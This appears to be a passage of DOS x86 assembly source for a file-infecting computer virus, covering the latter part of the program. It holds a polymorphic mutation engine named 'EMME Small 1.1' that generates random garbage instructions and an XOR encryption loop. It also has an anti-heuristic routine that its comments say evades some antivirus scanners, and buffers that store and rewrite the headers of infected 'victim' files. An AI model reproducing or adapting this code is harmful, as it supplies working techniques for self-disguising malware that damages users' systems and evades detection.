|
|
|||
|
|
|||
|
mov cx,CrLen
|
|||
|
mov bx,0FFFFh
|
|||
|
pop si
|
|||
|
encryptor:
|
|||
|
movsw
|
|||
|
xor word ptr es:[di-2],bx
|
|||
|
sub bx,0
|
|||
|
loop encryptor
|
|||
|
|
|||
|
ret
|
|||
|
|
|||
|
makeini:
|
|||
|
mov byte ptr ds:[bp+offset Reg - Emme11],10h
|
|||
|
make:
|
|||
|
;-----------------------
|
|||
|
; Makes from 1 up to 8
|
|||
|
; bytes of garbage code
|
|||
|
;-----------------------
|
|||
|
in ax,40h
|
|||
|
and ax,00000111b
|
|||
|
inc ax ; Number of bytes
|
|||
|
mov dx,ax
|
|||
|
poly:
|
|||
|
push dx
|
|||
|
;------------------------------------
|
|||
|
; Generate 1-byte command
|
|||
|
;------------------------------------
|
|||
|
form_1:
|
|||
|
call rnd
|
|||
|
|
|||
|
add bx,bp
|
|||
|
mov al,byte ptr ds:[bx+offset data_1-Emme11]
|
|||
|
good_1:
|
|||
|
stosb
|
|||
|
dec dx
|
|||
|
form_2:
|
|||
|
;-------------------------------------
|
|||
|
; Generate 2-bytes command
|
|||
|
;-------------------------------------
|
|||
|
cmp dx,2
|
|||
|
jb PolyStop
|
|||
|
|
|||
|
call rnd
|
|||
|
call _free
|
|||
|
jnz form_3
|
|||
|
|
|||
|
mov al,8
|
|||
|
mul bl
|
|||
|
add al,0C0h
|
|||
|
push ax
|
|||
|
call rnd
|
|||
|
pop ax
|
|||
|
add al,bl
|
|||
|
xchg ah,al
|
|||
|
|
|||
|
add bx,bp
|
|||
|
mov al,byte ptr ds:[bx+offset data_2-Emme11]
|
|||
|
stosw
|
|||
|
dec dx
|
|||
|
dec dx
|
|||
|
form_3:
|
|||
|
;-------------------------------------
|
|||
|
; Generate 3-bytes command
|
|||
|
;-------------------------------------
|
|||
|
cmp dx,3
|
|||
|
jb PolyStop
|
|||
|
|
|||
|
call _form
|
|||
|
jnz form_4
|
|||
|
mov al,83h
|
|||
|
stosw
|
|||
|
in al,40h
|
|||
|
stosb
|
|||
|
sub dx,3
|
|||
|
form_4:
|
|||
|
;-------------------------------------
|
|||
|
; Generate 4-bytes command
|
|||
|
;-------------------------------------
|
|||
|
cmp dx,4
|
|||
|
jb PolyStop
|
|||
|
|
|||
|
call _form
|
|||
|
jnz PolyStop
|
|||
|
mov al,81h
|
|||
|
stosw
|
|||
|
in ax,40h
|
|||
|
xor ax,di
|
|||
|
stosw
|
|||
|
sub dx,4
|
|||
|
PolyStop:
|
|||
|
or dx,dx
|
|||
|
jnz form_1
|
|||
|
|
|||
|
pop dx
|
|||
|
|
|||
|
ret
|
|||
|
|
|||
|
ZeroTwo:
|
|||
|
call rnd
|
|||
|
mov ax,bx
|
|||
|
mov bl,3
|
|||
|
div bl
|
|||
|
mov bl,ah
|
|||
|
add bx,bp
|
|||
|
ret
|
|||
|
|
|||
|
;-----------------------------------------------------------------
|
|||
|
Reg db 10h ; This byte is to mark registers
|
|||
|
; involved in decryptor.
|
|||
|
; 10h means don't use SP as a garbage
|
|||
|
; register ;)
|
|||
|
;-----------------------------------------------------------------
|
|||
|
; Data for polymorphic engine
|
|||
|
;-----------------------------------------------------------------
|
|||
|
data_1 db 0f5h,0f8h,0f9h,0fbh,0fch,0fdh,09eh,090h
|
|||
|
data_2 db 03h,0bh,013h,01bh,023h,02bh,033h,085h
|
|||
|
pack_1:
|
|||
|
mov_reg1 db 0beh,0bfh,0bbh
|
|||
|
xor_reg1 db 04h,05h,07h
|
|||
|
inc_reg1 db 046h,047h,043h
|
|||
|
operations:
|
|||
|
mirror1 db 01h,031h,029h
|
|||
|
mirror2 db 0c0h,0e8h
|
|||
|
;---------------------------------------------------------------------
|
|||
|
db 'EMME Small 1.1' ; Small Eternal Maverick Mutation Engine
|
|||
|
;---------------------------------------------------------------------
|
|||
|
_form proc near
|
|||
|
call rnd
|
|||
|
and al,03Fh
|
|||
|
add al,0C0h
|
|||
|
xchg al,ah
|
|||
|
_free:
|
|||
|
push bx
|
|||
|
push cx
|
|||
|
mov cl,bl
|
|||
|
mov bl,1
|
|||
|
shl bl,cl
|
|||
|
test byte ptr ds:[bp+offset Reg-Emme11],bl
|
|||
|
jmp short popcxbx
|
|||
|
f_reg:
|
|||
|
call rnd
|
|||
|
call _free
|
|||
|
jnz f_reg
|
|||
|
mov al,0B8h
|
|||
|
add al,bl
|
|||
|
stosb
|
|||
|
_fill:
|
|||
|
push bx
|
|||
|
push cx
|
|||
|
mov cl,bl
|
|||
|
mov bl,1
|
|||
|
shl bl,cl
|
|||
|
add byte ptr ds:[bp+offset Reg-Emme11],bl
|
|||
|
popcxbx:
|
|||
|
pop cx
|
|||
|
pop bx
|
|||
|
ret
|
|||
|
_form endp
|
|||
|
|
|||
|
rnd:
|
|||
|
;---------------------------
|
|||
|
; A bad way for getting a
|
|||
|
; random number
|
|||
|
;---------------------------
|
|||
|
push dx
|
|||
|
in ax,[40h]
|
|||
|
add ax,word ptr ds:[bp+offset Seed-Emme11]
|
|||
|
mov dx,25173
|
|||
|
mul dx
|
|||
|
add ax,13849
|
|||
|
pop dx
|
|||
|
mov word ptr ds:[bp+offset Seed-Emme11],ax
|
|||
|
xor ax,word ptr ds:[bp+offset ForXor-Emme11]
|
|||
|
mov bx,ax
|
|||
|
and bx,7
|
|||
|
ret
|
|||
|
|
|||
|
Seed dw 37849
|
|||
|
ForXor dw 559
|
|||
|
|
|||
|
;--------------------------------
|
|||
|
; Built-in anti-heuristic,
|
|||
|
; bad against DrWeb, but good
|
|||
|
; againt some other antiviruses
|
|||
|
;--------------------------------
|
|||
|
anti:
|
|||
|
xor ax,ax
|
|||
|
in ax,40h
|
|||
|
or ax,ax
|
|||
|
int 20h
|
|||
|
push cs
|
|||
|
pop ds
|
|||
|
;--------------------------------
|
|||
|
; Cryptor Pattern
|
|||
|
;--------------------------------
|
|||
|
Pattern:
|
|||
|
xor word ptr ds:[di],bx
|
|||
|
inc di
|
|||
|
inc di
|
|||
|
sub bx,0
|
|||
|
inc cx
|
|||
|
jnz Pattern
|
|||
|
;----------------------------------------
|
|||
|
; End of Polymorphic Engine
|
|||
|
;----------------------------------------
|
|||
|
bytes:
|
|||
|
;----------------------------------------
|
|||
|
; Victim file header
|
|||
|
;----------------------------------------
|
|||
|
db 10h dup (0)
|
|||
|
dw offset vstack
|
|||
|
dw 0
|
|||
|
dw offset endv
|
|||
|
db 2 dup (0)
|
|||
|
;-----------------------------------------------------------------
|
|||
|
db 400h-18h dup (0) ; Rest of files' first 1024 bytes
|
|||
|
;-----------------------------------------------------------------
|
|||
|
NewBytes:
|
|||
|
db 18h dup (0) ; New header for infected file
|
|||
|
endcode:
|
|||
|
db 10h dup (0)
|
|||
|
buffer:
|
|||
|
db 0900h dup (0) ; Buffer for crypting
|
|||
|
SaveOff dw 0 ; Used in polymorphic engine
|
|||
|
endv:
|
|||
|
mov ah,4ch
|
|||
|
int 21h
|
|||
|
.stack
|
|||
|
dw 16 dup (0)
|
|||
|
vstack:
|
|||
|
end start
|